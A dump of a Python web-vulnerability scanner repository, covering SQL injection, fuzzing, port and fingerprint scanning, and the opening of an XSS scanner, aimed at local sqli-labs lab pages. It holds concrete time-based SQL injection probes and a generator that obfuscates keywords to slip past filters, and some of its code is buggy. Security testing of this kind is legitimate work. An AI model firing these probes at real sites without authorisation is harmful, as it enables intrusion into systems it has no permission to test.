'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11']
def relocatedTest(self,attr,value,url):
try:
driver = webdriver.Firefox(options=self.firefox_options)
driver.get(url)
tag = driver.find_element_by_xpath('//*[@{}="{}"]'.format(attr,value))
ActionChains(driver).move_to_element(tag).click(tag).perform()
tempUrl = driver.current_url
#print("[19]",tempUrl,sep="")
if tempUrl == url:
driver.close()
return 1
else:
driver.close()
return tempUrl
except:
driver.close()
return 1
def process_request(self,request,spider):
self.browser.get(request.url)
clickList = self.browser.find_elements_by_xpath("//*[@onclick]")
mouseList = self.browser.find_elements_by_xpath("//*[@onmousemove]")
#print("[12]",clickList,sep="")
redirectUrls=[]
try:
if clickList:
for tag in clickList:
attr = tag.get_attribute('onclick')
#print("[18]",attr,sep="")
result = self.relocatedTest("onclick",attr,request.url)
if result != 1:
clickList.remove(tag)
#print("[14]",result,sep="")
redirectUrls.append(result)
#print("[11]",clickList,sep="")
#print("[13]",redirectUrls,sep="")#模拟鼠标移动
except exceptions.MoveTargetOutOfBoundsException as e:
print("error")
pass
result = self.browser.page_source + "<div class='redir'>{}</div>".format(",".join(redirectUrls))
#print("[5]"+result)
#self.browser.close()
return HtmlResponse(url=request.url,body=result,status=200,request=request,encoding="utf8")
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,651 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/test/test1.py | # -*- coding: UTF-8 -*-
from difflib import SequenceMatcher
import requests
import sys
from urllib import parse
import re
import aiohttp
from aiohttp import ClientSession
import asyncio
import json
import time
url = "http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and(sleep(if(!(select(aScii(suBstr('867546938',2,1))<>54)),5,1)))%23"
time1 = time.time()
q = requests.get(url)
time2 = time.time()
print(time2 - time1) | {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,652 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/error_inject.py | import asyncio
import aiohttp
from aiohttp import ClientSession
from urllib import parse
import re
import sys
import os
from colorama import Fore, Style, Back
from concurrent.futures import CancelledError
class error_inject():
def __init__(self,url,method = "GET",headers = "sql_injection/payload/header.txt",payload_num = 10):
self.url = url
self.method = method
self.header_file = headers
self.regx = r"[0-9]*~~~!@~~~[0-9]+"
self.payload_file = "sql_injection/payload/error.txt"
self.queue = asyncio.Queue()
self.headers = {
'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
self.flag_ = "886689288"
self.loop = asyncio.get_event_loop()
self.num = 200
self.tasks = []
self.data = {}
self.postHeaders = {}
self.flag = 0
self.payload_final_num = payload_num
self.payload_temp_num = 0
def payload_in_queue(self):
with open(self.payload_file,"r") as f:
for payload in f:
self.queue.put_nowait(payload.strip("\n"))
def prepare_post(self,payload):
with open(self.header_file,"r") as f:
for i in f:
if not self.postHeaders:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
else:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
async def get_response(self,payload,session):
if self.method == "GET":
payload = parse.quote(payload.encode("utf-8"))
url = self.url.replace("*",payload)
s = await session.get(url,headers = self.headers)
await session.close()
return await s.text()
else:
self.prepare_post(payload)
self.postHeaders.pop("Content-Length")#bug
s = await session.post(self.url,headers = self.postHeaders,data = self.data)
await session.close()
return await s.text()
async def sql_scan(self):
while not self.queue.empty():
session = ClientSession()
try:
payload_ = await self.queue.get()
payload_ = payload_.replace("[REPLACE]",self.flag_)
response = await self.get_response(payload_,session)
if "You have an error in your SQL syntax" in response:
continue
if re.search(self.regx,response):
self.flag += 1
self.payload_temp_num += 1
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*] available payload: {}\n".format(payload_))
if self.payload_temp_num == self.payload_final_num:
self.close()
except:
await session.close()
pass
def start(self):
try:
self.payload_in_queue()
self.tasks = [self.sql_scan() for i in range(self.num)]
self.loop.run_until_complete(asyncio.wait(self.tasks))
except CancelledError:
pass
if self.flag == 0:
sys.stdout.write(Fore.LIGHTRED_EX + "[-] can't error inject\n")
def close(self):
for task in asyncio.Task.all_tasks():
task.cancel()
'''if __name__ == "__main__":
a = error_inject("http://localhost/sqli-labs-master/Less-14/?id=*",method="POST")
a.start()
#a.prepare_post("sunsec")
#print(a.postHeaders)
#print(a.data)''' | {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,653 | PanDa1G1/sunsecScanner | refs/heads/master | /sunTest/sunTest/spiders/quotes.py | # -*- coding: utf-8 -*-
import scrapy
import re
from sunTest.items import SuntestItem
from bloom_filter import BloomFilter
class QuotesSpider(scrapy.Spider):
name = 'quotes'
allowed_domains = []
start_urls = ['http://127.0.0.1/php/1.php']
def __init__(self):
self.spiderUlrs=[]
self.whiteList=["php","asp"]
self.bloom = BloomFilter(max_elements=1000000, error_rate=0.1)
def getFormList(self,response):
forms = response.css("form")
result = []
for form in forms:
tempUrl = form.css("::attr(action)").get()+"?"
#print("[8]"+tempUrl)
method = form.css("::attr(method)").get()
names = form.css("input::attr(name)").getall()
if method.lower() == "get":
for name in names:
if name.lower() == "submit":
tempUrl += "submit=submit"
else:
tempUrl = tempUrl + name + "=*&"
finalUrl=tempUrl.strip("&")
#print("[9]"+finalUrl)
result.append(finalUrl)
return result
def getMode(self,url):
url_ = url.split("?")
if len(url_) ==1:
mode = url
else:
attr = re.sub("=[a-zA-Z0-9_-]+","=*",url_[1])
mode = url_[0] + "?" + attr
return mode
def parse(self, response):
hrefList=[]
srcList=[]
formList=[]
redirList=[]
items = SuntestItem()
hrefList = response.css("a::attr(href)").getall()
linkList = response.css("link::attr(href)").getall()
srcList = [i.css("*::attr(src)").get() for i in response.css("[src]")]
formList = self.getFormList(response)
redirtext=response.css(".redir::text").get()
if redirtext:
redirList=redirtext.split(",")
#print("[3]",redirList,sep="")
UrlList = hrefList+srcList+formList+redirList+linkList
#print("[3]{}".format(formList))
for url in UrlList:
if not re.match("http",url):
finalUrl = response.urljoin(url)
urlmode = response.urljoin(self.getMode(url))
else:
finalUrl = url
urlmode = self.getMode(url)
#print("[2]{}".format(urlmode))
if urlmode not in self.bloom:
if finalUrl.split(".")[-1] in self.whiteList or finalUrl.split("?")[0].split("/")[-1].split(".")[-1] in self.whiteList:
self.bloom.add(urlmode)
items["scanUrl"] = urlmode
self.spiderUlrs.append(finalUrl)
yield items
#print("[1] spiderUlrs{}".format(self.spiderUlrs))
for url in self.spiderUlrs:
temp = scrapy.Request(url=url,callback = self.parse)
self.spiderUlrs.remove(url)
yield temp
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,654 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/Boolen_scan.py | import requests
from difflib import SequenceMatcher
from colorama import Fore, Style, Back
from urllib import parse
import threading
import queue
import sys
class Boolen_Scan():
def __init__(self,url,method = "GET",file = "sql_injection/payload/header.txt",string = "",not_string = "",thread_num = 50,payload_num = 10):
self.url = url
self.method = method
self.header_file = file
self.string = string
self.not_string = not_string
self.paylaodFile = "sql_injection/payload/Boolen.txt"
self.headers = {
'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'close',
'Cache-Control': 'max-age=0',
}
self.queue_ = queue.Queue()
self.thread_num = thread_num
self.flag = 0
self.data = {}
self.postHeaders = {}
self.payload_final_num = payload_num
self.payload_temp_num = 0
def get_page(self,payload):
if self.method == "GET":
payload = parse.quote(payload.encode("utf-8"))
url = self.url.replace("*",payload)
text = requests.get(url,headers = self.headers).content
return text.decode("utf-8")
else:
self.prepare_post(payload)
text = requests.post(self.url,headers = self.postHeaders,data = self.data).content
return text.decode("utf-8")
def prepare_post(self,payload):
with open(self.header_file,"r") as f:
for i in f:
if not self.postHeaders:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
else:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
def scan(self):
while not self.queue_.empty():
TruePayload = self.queue_.get()
TruePage = self.get_page(TruePayload)
FalsePayload = TruePayload.replace("2","3")
FalsePage = self.get_page(FalsePayload)
if self.string:
if self.string in TruePage and TruePage != FalsePage:
self.flag +=1
self.payload_temp_num += 1
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload {}\n".format(TruePayload))
if self.payload_temp_num == self.payload_final_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
sys.exit(0)
elif self.not_string:
if self.not_string in FalsePage and TruePage != FalsePage:
self.flag += 1
self.payload_temp_num += 1
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload {}\n".format(TruePayload))
if self.payload_temp_num >= self.payload_final_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
sys.exit(0)
else:
ratio = self.get_ratio(FalsePayload,TruePage)
if ratio <0.994:
self.flag += 1
self.payload_temp_num += 1
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload {}\n".format(TruePayload))
if self.payload_temp_num == self.payload_final_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
sys.exit(0)
#print(TruePayload,FalsePayload,ratio,sep = "\n")
def get_ratio(self,payload,res_text):
seqm = SequenceMatcher()
text = self.get_page(payload)
seqm.set_seq1(text)
seqm.set_seq2(res_text)
return seqm.ratio()
def payload_in_queue(self):
with open(self.paylaodFile,"r") as f:
for payload in f:
TruePayload = payload.split("\n")[0]
self.queue_.put(TruePayload)
def start(self):
self.payload_in_queue()
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
if not self.flag:
sys.stdout.write(Fore.LIGHTRED_EX + "[-]can't Boolen inject\n")
if __name__ == "__main__":
a = Boolen_Scan("http://127.0.0.1/sqli-labs-master/Less-15/?id=*",thread_num = 100,method="POST")
a.start()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,655 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/time_scan.py | import requests
from colorama import Fore, Style, Back
from urllib import parse
import threading
import queue
import time
import sys
class Time_scan():
def __init__(self,url,method = "GET",file = "sql_injection/payload/header.txt",thread_num = 50,payload_num = 10,wait_time=5):
self.url = url
self.method = method
self.header_file = file
self.paylaodFile = "sql_injection/payload/time.txt"
self.headers = {
'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'close',
'Cache-Control': 'max-age=0',
}
self.queue_ = queue.Queue()
self.thread_num = thread_num
self.flag = 0
self.data = {}
self.postHeaders = {}
self.payload_final_num = payload_num
self.payload_temp_num = 0
self.wait_time = wait_time
def payload_in_queue(self):
with open(self.paylaodFile,"r") as f:
for payload in f:
TruePayload = payload.split("\n")[0]
self.queue_.put(TruePayload)
def get_time(self,payload):
if self.method == "GET":
payload = parse.quote(payload.encode("utf-8"))
url = self.url.replace("*",payload)
time1 = time.time()
requests.get(url,headers = self.headers)
time2 = time.time()
return time2 - time1
else:
self.prepare_post(payload)
time1 = time.time()
requests.post(self.url,headers = self.postHeaders,data = self.data)
time2 = time.time()
return time2 - time1
def prepare_post(self,payload):
with open(self.header_file,"r") as f:
for i in f:
if not self.postHeaders:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
else:
if ":" in i.strip("\n"):
temp = i.strip("\n").split(":")
self.postHeaders[temp[0]] = temp[1].strip(" ")
if "&" in i.strip("\n"):
temp = i.strip("\n").split("&")
for data_ in temp:
data1 = data_.split("=")
if "*" in data1:
self.data[data1[0]] = payload
else:
self.data[data1[0]] = data1[1].strip(" ")
def scan(self):
while not self.queue_.empty():
payload = self.queue_.get().replace('[wait_time]',str(self.wait_time))
#print(payload)
time_ = self.get_time(payload)
if time_ > self.wait_time - 1:
self.payload_temp_num += 1
self.flag +=1
sys.stdout.write(Fore.LIGHTGREEN_EX + "[*]available payload {}\n".format(payload))
if self.payload_temp_num == self.payload_final_num:
sys.stdout.write(Fore.LIGHTYELLOW_EX + "[*]scan finished\n")
sys.exit(0)
def start(self):
self.payload_in_queue()
thread_ = []
for i in range(self.thread_num):
t = threading.Thread(target = self.scan())
thread_.append(t)
t.start()
for t in thread_:
t.join()
if not self.flag:
sys.stdout.write(Fore.LIGHTRED_EX + "[-]can't Boolen inject\n")
if __name__ == "__main__":
a = Time_scan("http://127.0.0.1/sqli-labs-master/Less-9/?id=*")
a.start() | {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,656 | PanDa1G1/sunsecScanner | refs/heads/master | /src/fuzz.py | import asyncio
from aiohttp import ClientSession
import requests
import hashlib
import aiohttp
from src._print import _print
import time
import io
from difflib import SequenceMatcher
class Fuzz(set):
def __init__(self,url):
self.url = url.split('?')[0]
self.queue1 = asyncio.Queue()
self.queue2 = asyncio.Queue()
self.loop = asyncio.get_event_loop()
self.num = 100
self.list = []
self.headers = {
'User-agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8',
'Accept-Language': 'Zh-CN, zh;q=0.8, en-gb;q=0.8, en-us;q=0.8',
'Accept-Encoding': 'identity',
'Keep-Alive': '300',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
}
self.param = url.split('?')[1].split('=')[0]
self._print = _print()
self.high_ratio = 0.70
self.low_ratio = 0.02
def str_in_queue(self):
with open('directroy/pathtotest_huge.txt','rb') as f:
while True:
string = f.readline().decode('utf-8').strip()
if string:
self.queue1.put_nowait(string)
else:
break
self.length1 = self.queue1.qsize()
def get_param(self):
with open('directroy/123.txt','r') as f1:
while True:
param = f1.readline().strip()
if param:
self.list.append(param)
else:
break
self.length2 = len(self.list)
def origin_md5(self):
text = requests.get(self.url,headers = self.headers).text
m = hashlib.md5()
m.update(bytes(text,encoding = 'utf-8'))
self.hex = m.hexdigest()
def get_ratio(self,res_text):
seqm = SequenceMatcher()
text = requests.get(self.url,headers = self.headers).text
seqm.set_seq1(text)
seqm.set_seq2(res_text)
return seqm.ratio()
async def fuzz(self,param):
session = ClientSession()
while True:
if not self.queue1.empty():
string = await self.queue1.get()
url = self.url + '?' + str(param) + '=' + str(string)
try:
text = await self.get_response(url,session)
#print(text)
ratio = self.get_ratio(text)
#print(url,ratio)
if ratio > self.low_ratio and ratio < self.high_ratio:
self._print.fuzz_res(param,string)
if ratio == 0:
self._print.fuzz_res(param,string)
except:
pass
else:
#print(param)
await session.close()
break
async def get_response(self,url,session):
s = await session.get(url,headers = self.headers)
return await s.text()
def make_cor(self):
if self.length2 == 1:
self.tasks = [self.fuzz(self.param) for i in range(self.num)]
self.loop.run_until_complete(asyncio.wait(self.tasks))
else:
for param in self.list:
self.tasks = [self.fuzz(param) for i in range(self.num)]
self.loop.run_until_complete(asyncio.wait(self.tasks))
self.str_in_queue()
def start(self):
self._print.print_info("Start fuzz : %s" % time.strftime("%H:%M:%S"))
time0 = time.time()
if self.param == 'fuzz':
self.get_param()
self.str_in_queue()
else:
self.str_in_queue()
self.length2 = 1
self.make_cor()
time2 = time.time() - time0
self._print.port_end(time2)
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,657 | PanDa1G1/sunsecScanner | refs/heads/master | /src/test.py | # -*- coding: UTF-8 -*-
import sqlite3
from urllib import parse
import requests
from bs4 import BeautifulSoup
from _print import _print
import os
import time
import re
class FingerScan(set):
def __init__(self,url,db):
self._print = _print()
self.url = url
self.headers = {'UserAgent':'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))'}
self.db = db
self.path = os.path.dirname(os.path.abspath(__file__))
self.db_path = os.path.join(self.path,self.db)
self.zz = '\"(.*)\"'
self.zz_2 = '\(.*&&.*\)'
def make_url(self):
parts = parse.urlparse(self.url)
scheme = parts[0]
if scheme == '':
self.url = 'http://' + self.url
if self.url[-1:] != '/':
self.url += '/'
def get_message(self):
try:
self.make_url()
res = requests.get(self.url,headers = self.headers,timeout=3)
content = res.text
headers = res.headers
soup = BeautifulSoup(content, 'lxml')
if soup.title:
title = soup.title.string.strip()
return content,headers,title
else:
title = 'none'
return content,headers,title
except Exception as e:
pass
def get_count(self):
with sqlite3.connect(self.db_path) as conn:
cur = conn.cursor()
count = cur.execute('SELECT COUNT(id) FROM `fofa`')
for i in count:
return i[0]
def get_dic(self,id_):
with sqlite3.connect(self.db_path) as conn:
cur = conn.cursor()
result = cur.execute("SELECT name,keys FROM `fofa` where id = '{}'".format(id_))
for row in result:
return row[0],row[1]
def check_rule(self,issue,content,header,title):
if "header" in issue:
str_ = re.search(self.zz,issue).group(1).lower()
if str_ in str(header).lower():
return True
elif 'body' in issue:
str_ = re.search(self.zz,issue).group(1).lower()
if str_ in str(content).lower():
return True
elif 'title' in issue:
str_ = re.search(self.zz,issue).group(1).lower()
if str_ in str(title).lower():
return True
else:
str_ = re.search(self.zz,issue).group(1).lower()
if str_ in str(header).lower():
return True
def check(self,id_,count,content,header,title):
name,keys = self.get_dic(id_)
self._print.print_process((id_ / count)*100,id_)
if '||' in keys and '&&' not in keys and '(' not in keys and ')' not in keys:
for issue in keys.split('||'):
if self.check_rule(issue,content,header,title):
self._print.check_sess(self.url,name)
break
elif '||' not in keys and '&&' not in keys and '(' not in keys and ')' not in keys:
if self.check_rule(keys,content,header,title):
self._print.check_sess(self.url,name)
elif '&&' in keys and '||' not in keys and '(' not in keys and ')' not in keys:
cal = 0
for issue in keys.split('&&'):
if self.check_rule(issue,content,header,title):
cal += 1
if cal == len(keys.split('&&')):
self._print.check_sess(self.url,name)
else:
if re.search(self.zz_2,keys):
# a ||b||(c&&d)
for issue in keys.split('||'):
if '&&' not in issue:
if self.check_rule(issue,content,header,title):
self._print.check_sess(self.url,name)
break
else:
num = 0
issue = issue.replace('(','').replace(')','').strip()
for i in issue.split('&&'):
if self.check_rule(i,content,header,title):
num += 1
if num == len(issue.split('&&')):
self._print.check_sess(self.url,name)
else:
# a && b &&(c||d)
num = 0
for issue in keys.split('&&'):
if '||' not in issue:
if self.check_rule(issue,content,header,title):
num += 1
else:
issue = issue.replace('(','').replace(')','').strip()
for i in issue.split('||'):
if self.check_rule(i,content,header,title):
num += 1
break
if num == len(keys.split('&&')):
self._print.check_sess(self.url,name)
def run(self):
try:
self._print.print_info("Start: %s" % time.strftime("%H:%M:%S"))
count = self.get_count()
content,header,title = self.get_message()
for i in range(1,count + 1):
self.check(i,count,content,header,title)
except Exception as e:
print(e)
if __name__ == "__main__":
a = FingerScan('127.0.0.1','web.db')
print(a.make_url())
a.run()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,658 | PanDa1G1/sunsecScanner | refs/heads/master | /src/port_scan.py | import nmap
import queue
import threading
from src._print import _print
import socket
import time
class myThread():
def __init__(self,host,port,thread_num = 100):
self.host = host
self._print = _print()
self.port = port
self.q = queue.Queue()
self.timeout = 0.1
self.threads = [threading.Thread(target = self.thread_work) for i in range(thread_num)]
self.thread_num = thread_num
self.flag = False
def in_queue(self):
if '-' in self.port:
hport = int(self.port.split('-')[1])
lport = int(self.port.split('-')[0])
for i in range(lport,hport + 1):
self.q.put(i)
self.flag = True
elif ',' in self.port:
ports = self.port.split(',')
for port in ports:
self.q.put(int(port))
else:
self.q.put(int(self.port))
def out_queue(self):
return self.q.get()
def thread_work(self):
while not self.q.empty():
port = self.out_queue()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.timeout)
res = s.connect_ex((self.host, port))
s.close()
if self.flag:
if res == 0:
try:
service = socket.getservbyport(port)
except:
service = 'unknown'
self._print.port_res(port,'open',service)
try:
self.bannergrabber(self.host,port)
except:
print('fail')
continue
else:
if res == 0:
self._print.port_sess(port,'open')
else:
self._print.port_fail(port,'close')
def bannergrabbing(addr, port):
bannergrabber = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
socket.setdefaulttimeout(2)
bannergrabber.connect((addr, port))
bannergrabber.send('WhoAreYou\r\n')
banner = bannergrabber.recv(100)
bannergrabber.close()
print(banner, "\n")
def scan_start(self):
self._print.print_info("Start scan port : %s" % time.strftime("%H:%M:%S"))
time0 = time.time()
for i in self.threads:
i.start()
for i in self.threads:
i.join()
time2 = time.time() - time0
self._print.port_end(time2)
if __name__ == "__main__":
a = myThread('192.168.8.150','1-65535')
a.in_queue()
a.scan_start()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,659 | PanDa1G1/sunsecScanner | refs/heads/master | /sql_injection/make_dict/make_time_payload.py |
a = [("and","AnaNdd"),("suBstr","Mid"),("select","SELSEleCtect"),("aScii","aSciaSciii"),("suBstr","subSuBstrstr")]
pre_ = ["' ",'" ',"') "," ","')) ",")' ","))' ",'") ','")) ',')" ','))" ']
stuff_ = ["#","-- ","and('1')='1","and('1')=\"1","and('1')=('1","and('1')=(\"1","and('1')=(('1","and('1')=((\"1","and('1')='(1","and('1')='((1","and('1')=\"((1","and('1')=\"(1"]
payload1 = "and(sleep(if((select(aScii(suBstr('867546938',2,1)))=54),[wait_time],1)))"
payload2 = "and(sleep(if(!(select(aScii(suBstr('867546938',2,1))<>54)),[wait_time],1)))"
with open("../payload/time.txt","a+") as f:
for pre in pre_:
for stuff in stuff_:
f.write('1' + pre+payload1+stuff+ "\n")
f.write('1' + pre+payload2+stuff + "\n")
#1
for i in range(len(a)):
for j in range(i + 1,len(a)):
f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]) + "\n")
f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]) + "\n")
#2
for i in range(len(a)):
for j in range(i + 1,len(a)):
f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]) + "\n")
#3
for i in range(len(a)):
for j in range(i+1,len(a)):
for k in range(j+1,len(a)):
f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]) + "\n")
#4
for i in range(len(a)):
for j in range(i+1,len(a)):
for k in range(j+1,len(a)):
for l in range(k+1,len(a)):
f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]) + "\n")
#5
for i in range(len(a)):
for j in range(i+1,len(a)):
for k in range(j+1,len(a)):
for l in range(k+1,len(a)):
for m in range(l+1,len(a)):
f.write(('1' + pre+payload1+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
f.write(('1' + pre+payload2+stuff).replace(a[i][0],a[i][1]).replace(a[j][0],a[j][1]).replace(a[k][0],a[k][1]).replace(a[l][0],a[l][1]).replace(a[m][0],a[m][1]) + "\n")
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,660 | PanDa1G1/sunsecScanner | refs/heads/master | /xss/xss_scan.py | # -*- coding: UTF-8 -*-
import requests
import re
import threading
import queue
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.alert import Alert
import time
from urllib.parse import quote
import sys
from colorama import Fore, Style, Back
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.action_chains import ActionChains
class xss_Scanner():
def __init__(self,url,payload_num = 3,thread_num=50):
self.url = url
self.headers = {
